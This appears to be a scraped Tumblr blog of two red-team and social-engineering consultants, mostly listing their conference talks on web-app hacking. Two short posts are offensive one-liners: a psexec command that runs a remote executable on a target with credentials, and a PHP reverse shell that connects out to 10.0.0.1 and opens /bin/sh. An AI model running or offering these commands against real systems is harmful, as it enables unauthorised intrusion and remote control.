wehackpeople
We Hack People
Tim Roberts (Z4nsh1n) & Brent White (B!TK!LL3R) are Sr. Security Consultants who specialize in Red Team & Social Engineering Assessments. They have spoken at DEF CON, B-Sides, DerbyCon, PhreakNIC, SaintCon, NolaCon, CircleCityCon, ISSA International, InfoSec World, and much more.
26 posts
Don't wanna be here? Send us removal request.
Last Seen Blogs
funtimefoxy154-blog
Funtime Foxy
fernsnailz
im an alternate dimension boy
moths-obsessions
moth/bev
infelious
Magical Girl Art Corner
satansshoate
Into A Variety Of Men And Scenes
Text
We Have Moved...
We have a new website, and no longer post updates on Tumblr.
Visit www.wehackpeople.com for the most recent posts and info.
1 note
·
View note
Photo
My #Hack5 LAN Turtle is ready for deployment! Hopefully the tape will be convincing for this #SocialEngineering assessment.
--Brent
1 note
·
View note
Text
Speaking Engagement Updates
So, updates.....
Looks like the last conference we mentioned was B-Sides Charleston in 2015. Since then, we’ve spoken at the following conferences and met incredible people along the way!
B-Sides Nashville - Nashville, TN - 4/16/2016
“Forging Your Identity -- Credibility Beyond Words”
Brent & Tim
Video Link: https://www.youtube.com/watch?v=5xyApVBRnio
AIDE - Marshall Univ - Huntington, WV - 4/21/2016
“Hacking Web Apps (v2)”
Brent & Tim
Video Link: https://www.youtube.com/watch?v=WXd4cxw9uDk
NolaCon - New Orleans, LA - 5/20/2016
“Hacking Web Apps (v2)”
Brent
Video Link: https://www.youtube.com/watch?v=pwqqVlSJeNI
Techno Security Con - Myrtle Beach, SC - 6/7/2016
“Hacking Web Apps (v2)”
Brent & Tim
Video Link: N/A
TakeDownCon--Rocket City - Huntsville, AL - 7/19/2016
“Hacking Web Apps (v2)”
Brent
Video Link: N/A
#hacking#BSides#NolaCon#marshall university#techno security#BrentWhite#TimRoberts#NTTSecurity#Solutionary#TakeDownCon
1 note
·
View note
Text
“Trust, yet verify” - A Social Engineering Assessment - Brent White
Here is a blog post I wrote recently for work regarding a social engineering / physical security assessment that I performed:
https://www.solutionary.com/resource-center/blog/2016/02/social-engineering-assessment/
0 notes
Text
B-Sides Charleston - 2015 - Tim Roberts & Brent White “Hacking Web Apps (v2)”
Tim and I enjoyed B-Sides. The location was excellent and people were very nice as well. It was great to have conversations during our talk as well as afterwards. Thanks for having us out!
If you’re interested in watching the talk, here is the link:
https://www.youtube.com/watch?v=-W3bJ_FtGjE
0 notes
Text
PhreakNIC 2015 - Nashville, TN - Brent White “Hacking Web Apps”
PhreakNIC was another cool setting, smaller hacker con. It was nice to be able to have open conversations during my talk. Another great part of this was being on the Hacker 101 panel that evening. I’m glad that section wasn’t recorded. There were some very “interesting” topics and it certainly felt like an old-school hacker meetup where you talk about anything from hacking to politics to religion. It was a great experience and I’m hoping to be back next year.
My talk:
Hacking 101 panel. (I’m on the left end of the table. You can see part of my maroon shirt.)
0 notes
Text
SaintCon 2015 - Brent White “Intro to Hacking Web Apps”
SaintCon was pretty awesome. It was nice being out in Ogden, UT for a few days as well. Such a beautiful area. The con was held in a very nice building at Weber State University and I have to say that it was one of the most well organized cons that I’ve been to. I appreciate the staff for letting me come out and speak.
If you’re interested in watching the video and listening to some of the great questions that were asked at the end, here is the link:
https://www.youtube.com/watch?v=SCPS2QPmMaw
This screenshot is from the slide where I mention that a vulnerability scan is NOT a penetration test. And, to those who say it is, you’re wrong. :)
0 notes
Text
SkyDogCon - 2015 - Brent White “Hacking Web Apps”
SkyDogCon in Nashville has such a cool format and atmosphere! During my talk, there was another stage to my right with a couch on it. Ir0nGeek (Adrian Crenshaw) and a few others sat on it and asked questions/trolled me during my talk. It was fun! It felt more like a conversation with friends in a living room instead of presenting at a con. The talk was very open and I was able to get into some good convo with many people. Awesome!
SkyDog is just so freaking tall though and had made podium himself, so of course, my laptop came up to the top of my head. I had to stand to the side to see everyone. Haha! #ShortPeopleProblems
The CTF was also pretty fun. I enjoyed picking away at that as time allowed.
If you’re interested in watching the talk and listening to the questions and conversations, here is a link:
https://www.youtube.com/watch?v=M8quKKC3-m4
0 notes
Text
DerbyCon 5.0 - Brent White “Hacking Web Apps”
Brent here.
DerbyCon 5 - 2015 was awesome! I presented my talk “Hacking Web Apps” and really enjoyed the amount of questions that people asked during the Q&A portion at the end.
If you’re interested in watching my talk, here is the link:
https://www.youtube.com/watch?v=J1tHFEc09u0
DJ Rance doing his thing:
She loved all of the blinky lights. This pic of us actually made it into the DerbyCon closing ceremony video. So, that’s cool!
Dancing to DJ Rance
4yr old with lock picking skills
1 note
·
View note
Text
Execute file hosted on remote system w/ creds:
> psexec /accepteula \\<TargetIP> -u domain\user -p pass -c -f \\<smbIP>\share\file.exe
0 notes
Link
6 notes
·
View notes
Text
Hacking Your Hotel Room’s Thermostat
How to override your hotel's thermostat and disable the motion sensor to it as well:
http://viewfromthewing.boardingarea.com/2013/11/10/override-hotels-thermostat-controls-make-cool-hot-youd-like/
0 notes
Text
Preview: PhotoBump - Working plastic bump keys for any profile
This is a pretty awesome concept from decoder (@ mozdeco) that allows you to create a working bump key only using a photo of the keyway and the manufacturer specific details about the lock series.
http://unlocked.own-hero.net/2014/07/10/preview-photobump-plastic-bumpkeys/
0 notes
Text
DEF CON 23 - Brent White “Hacking Web Apps”
Brent here.
If you’re going to be at DEF CON 23, I’m speaking on Thursday at 11am on hacking web apps. Come on by if you’re able and check it out! I’ll be available for questions afterwards.
UPDATE:
That was a blast! I’m glad that there was such a great turnout as well as so many questions during the Q&A. Thanks to all of the Solutionary guys who came to the talk as well. It was cool to have an “entourage” for a few minutes.
“Don’t get nervous...”
Full room!
I also had the opportunity to interview with BBC News before entering for my talk:
The Solutionary entourage:
What a great experience!
“First Time Speaker” shot on stage:
0 notes
Text
CircleCityCon - Indianapolis, IN - 2015
CircleCityCon in Indianapolis! DrBearSec knows how to put on a great hacker conference. Thanks for having Tim and I out to speak.
Our talk was titled “From Parking Lot to Pwnage - Hack-free Network Pwnage”.
We did a bit of a different format with this talk. You’ll notice we’re sitting in chairs. The more informal, conversational approach is what we were aiming for and we feel as though it went well. Thanks to those who participated as well as asked questions!
Here is the link to our talk if you’re interested in watching:
https://www.youtube.com/watch?v=LORSYVD2rYk
https://circlecitycon.com/
The partys were great, the response during our talk was excellent as well. Thank you to everyone that listened to Tim and I speak about social engineering, physical security, OSINT and more.
We’ll see you at DEF CON 23!
0 notes
Text
PHP Reverse Shell
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
0 notes
Text
Physical Security Assessments?
So, this guy apparently didn’t plan this out very well. Otherwise, he would have learned his exits through basic reconnaissance. LOL!
0 notes